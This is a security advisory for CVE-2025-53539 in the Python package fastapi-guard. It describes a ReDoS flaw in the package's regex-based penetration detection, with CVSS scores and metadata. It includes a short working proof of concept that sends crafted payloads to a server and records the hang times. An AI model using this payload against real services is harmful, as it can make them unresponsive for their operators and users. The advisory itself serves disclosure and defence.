CVE-2025-53539 – fastapi-guard

Package

Manager: pip
Name: fastapi-guard
Vulnerable Version: >=0 <3.0.1

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

EPSS: 0.0006 pctl0.19093

Details

fastapi-guard is vulnerable to ReDoS through inefficient regex ### Summary fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs. It is not as severe as _exponential_ complexity ReDoS, but still downgrades performance and allows DoS exploits. An attacker can trigger high cpu usage and make a service unresponsive for hours by sending a single request in size of KBs. ### PoC e.g. https://github.com/rennf93/fastapi-guard/blob/1e6c2873bfc7866adcbe5fc4da72f2d79ea552e7/guard/handlers/suspatterns_handler.py#L31C79-L32C7 ```python payload = lambda n: '<'*n+ ' '*n+ 'style=' + '"'*n + ' '*n+ 'url('*n # complexity: O(n^5) print(requests.post("http://172.24.1.3:8000/", data=payload(50)).elapsed) # 0:00:03.771120 print(requests.post("http://172.24.1.3:8000/", data=payload(100)).elapsed) # 0:01:17.952637 print(requests.post("http://172.24.1.3:8000/", data=payload(200)).elapsed) # timeout (>15min) ``` Single-threaded uvicorn workers can not handle any other concurrent requests during the elapsed time. ### Impact Penetration detection is enabled by default. Services that use fastapi-guard middleware without explicitly setting `enable_penetration_detection=False` are vulnerable to DoS.

Metadata

Created: 2025-07-07T23:36:39Z
Modified: 2025-07-07T23:36:39Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j47q-rc62-w448/GHSA-j47q-rc62-w448.json
CWE IDs: ["CWE-1333"]
Alternative ID: GHSA-j47q-rc62-w448
Finding: F211
Auto approve: 1